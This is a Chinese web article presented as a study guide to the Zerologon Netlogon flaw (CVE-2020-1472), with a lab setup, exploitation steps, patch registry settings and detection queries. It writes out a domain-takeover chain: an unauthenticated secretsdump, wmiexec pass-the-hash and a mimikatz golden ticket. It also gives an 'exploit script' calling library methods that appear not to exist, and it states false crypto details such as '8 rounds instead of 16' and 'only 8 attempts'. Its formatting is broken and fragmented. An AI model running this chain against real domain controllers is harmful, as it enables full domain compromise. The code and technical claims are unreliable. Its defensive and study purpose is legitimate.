您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# Netlogon特权提升漏洞CVE-2020-1472该如何复习
## 漏洞背景与重要性
CVE-2020-1472(又称Zerologon)是微软Windows Netlogon远程协议(MS-NRPC)中的一个关键特权提升漏洞,于2020年8月由Secura公司研究员Tom Tervoort首次披露。该漏洞因其CVSS 3.1评分高达10.0分,被列为"严重"级别漏洞,影响所有Windows Server版本(2008R2至2019)。
### 漏洞核心机制
漏洞源于Netlogon协议在认证过程中对AES-CFB8加密算法的错误实现:
1. **初始化向量(IV)固定为零值**:未使用随机IV导致加密可预测
2. **未验证客户端提供的部分参数**:允许攻击者伪造身份凭证
3. **8轮加密代替标准16轮**:大幅降低暴力破解难度(理论成功率1/256)
## 漏洞复现与验证方法
### 实验环境搭建
推荐使用以下配置:
```bash
# 靶机环境
Windows Server 2016 DC (未打补丁)
IP: 192.168.1.100
# 攻击机
Kali Linux 2020+
工具集:Impacket, Zerologon-tester
python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDRESS
当输出Success!
时确认存在漏洞
# 重置机器账户密码
python3 secretsdump.py -no-pass DC_NETBIOS_NAME\$@DC_IP_ADDRESS
# 获取域管理员令牌
python3 wmiexec.py -hashes :NTLM_HASH DOMN/ADMIN@DC_IP
# 创建黄金票据
mimikatz # kerberos::golden /domain:DOMN /sid:S-1-5-21-... /rc4:31d6cfe0d16ae931b73c /user:Administrator /ptt
微软分两个阶段发布补丁:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters]
"FullSecureChannelProtection"=dword:00000001
graph TD
A[CVE-2020-1472] --> B[漏洞原理]
A --> C[影响范围]
A --> D[利用方法]
B --> B1[Netlogon协议缺陷]
B1 --> B11[AES-CFB8实现错误]
B1 --> B12[IV未随机化]
D --> D1[密码重置]
D --> D2[票据伪造]
为什么该漏洞只需要8次尝试即可成功?
域控制器如何强制实施安全补丁?
Domain Controller: Allow vulnerable Netlogon secure channel connections
设置为”禁用”如何检测网络中是否存在未修复设备?
nmap --script zerologon -p 445 <target>
推荐使用以下平台搭建实验环境: 1. TryHackMe:Zerologon Room 2. HackTheBox:Active机器(需VIP) 3. 本地虚拟化: - Windows Server 2016 + VMware ESXi - 配置至少2台DC实现域复制
# 自动化利用脚本示例
from impacket.dcerpc.v5 import nrpc
def exploit(target):
binding = r'ncacn_ip_tcp:%s[445]' % target
rpc_con = nrpc.DCERPCSession(binding)
rpc_con.setup_authenticator()
if rpc_con.attempt_exploit():
print("[+] 漏洞利用成功")
return rpc_con.get_hashes()
防护层级 | 具体措施 |
---|---|
网络层 | 限制445端口访问,启用SMB签名 |
主机层 | 启用LSA保护,配置Credential Guard |
监控层 | 部署SIEM检测异常Netlogon事件 |
<!-- Windows事件ID -->
<QueryList>
<Query Id="0">
<Select Path="Security">
*[EventID=4742] <!-- 机器账户密码更改 -->
*[EventID=4672] <!-- 特权登录 -->
</Select>
</Query>
</QueryList>
微软官方文档:
研究论文:
CTF挑战:
- [SecuraBV/Zerologon](https://github.com/SecuraBV/Zerologon)
- [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
- [risksense/zerologon](https://github.com/risksense/zerologon)
每周自查清单:
知识巩固建议:
注:本文所有渗透测试方法仅限授权环境使用,未经授权的测试可能违反《网络安全法》相关规定。 “`
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。